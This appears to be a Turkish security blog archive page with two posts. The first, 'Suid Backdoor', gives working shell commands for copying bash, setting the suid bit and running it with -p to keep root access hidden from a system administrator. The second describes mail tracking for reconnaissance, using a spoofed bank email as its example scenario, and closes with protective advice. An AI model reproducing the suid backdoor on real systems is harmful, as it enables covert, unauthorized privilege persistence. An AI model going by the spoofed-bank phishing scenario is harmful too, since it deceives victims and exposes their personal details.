Archive for September, 2009

Suid Backdoor

Parametresini unutup her bahsi geçildiğinde hatırlamaya çalıştığım ve bulmak için, iki saat nasıldı bu diye deneyip durduğum parametreyi buraya yazayım. Hem lazım olduğunda bulmam kolay olsun. Hemde bilmeyen varsa öğrenmiş olur :-)

Öncelikle root yetkilerine sahip olmuş olmanız gerekiyor. Nasıl root olacağınız bu yazının dışında kalan bir konu. Biz root olduktan sonrası ile ilgileniyoruz :-)

İlk olarak aşağıdaki komutlarla bash kabuğunun bir kopyasını alalım. Ben kendi ev dizinime kopyalamayı tercih ettim. Daha sonra chmod ile suid olarak ayarlayalım.

Kod:
mordor ~ # cp /bin/bash ~harun/backdoor
mordor ~ # chmod +s ~harun/backdoor

Artık  suid arkakapımız hazır. Bundan sonra yapmamız gereken -p parametresi ile ev dizinimize aldığımız suid bash kabuğumuzun kopyasını çalıştırmak olacak…

Kod:
harun@mordor ~ $ whoami
harun
harun@mordor ~ $ ./backdoor -p
harun@mordor ~ # whoami
root

Gençliğimizde, kullanıcı hesabımızın olduğu sistemlerde, sistem yöneticinden saklanıp zaman zaman root olabilmek için kullandığımız eski bir yöntem :-)

Saygılarımla…

2009
09/10
POSTED BY
CATEGORY
Ethical Hacker
Pentest Tools
Write comment

MailTracking

İzsürmeyi Tanımlamak
- iz sürme medotlu bir şekilde bir hedefin güvenlik profili hakkında bilgi toplamaktır.
- İz sürme 3 ön saldırı evresinden biridir.Diğerleri tarama ve enumeration dır.
- Kısacası iz sürme hedefin sistemleri (interneti,intraneti,extraneti ve wireless) hakkında
bilgi toplamaktır.

Bilgi Toplama Teknolojisi FootPrinting
- Bilgiyi ortaya çıkarmak
- Network ip aralığını bulmak
- Aktif makinaları bulmak
- Açık portları ve access point leri bulmak

Bu yazıda iz sürmede kullanılan etkili tekniklerden biri olan mailtracking e değinilecek , örneklerle kısaca açıklanacaktır.

MailTracking ; mail yolu ile iz sürme metodudur.
Bu iş için www.mailtracking.com ve www.pointofmail.com adressleri kullanılabilir.

Örnek Senaryo ;

Saldırgan , X A.Ş firmasının sistem yöneticisinin mail adresini bulmuştur ve saldırı öncesi hedefin ip adressi , browser bilgileri ve bulunduğu bölge gibi bilgileri edinmek istiyor.Bunu X A.Ş firmasının sistem yöneticisine  sahte bir mail adresinden yada kendina ait bir mail adresinden mail göndererek yapabilir.

Kurbanın mail adresine , Garani Bankasına ait bir mail adresinden (kurbanın garanti mağduru olduğu düşünülmüştür) banka hesabına ilişkin bir mail gönderilerek son derece gerçekçi bir saldırı yapılır ve kurbanın maili açması kaçınılmazdır : )

Mail gönderilen sayfadan bir görüntü , info@garanti.com.tr den kurbanın mail adresine (mail@ozanucar.com) bir mail gönderilir.

Kurban gelen maili açar ,

ve kurbanın tüm bilgileri yönetim sayfasına gelir ,

Korunma Yöntemleri ;

- Resim , dosya vb. ek bulunan mailleri görüntülerken kaynağının ve içeriğin güvenliğinden emin olmadan resimleri aktif etmeyin ve dosyaları açmayın.
- Gelişmiş antispam yazılımları kullanın , gelen fake mailleri aklı başında bir antispam yazılımı belirttiğiniz kurallara göre filtreleyecektir.

Bu bilgiler  saldırganın yeni ataklar yapmasını kolaylaştıracaktır. Browser , e-posta okuyucusunun açıklığından faydalanarak hacking yapabilir.
Bknz: FireFox 3.5 , ThunderBird

2009
09/10
POSTED BY
CATEGORY
Ethical Hacker
Pentest
Pentest Tools
TAGS


3 comments

Recent entry

Archive

Category

 
Hosting Sponsorumuz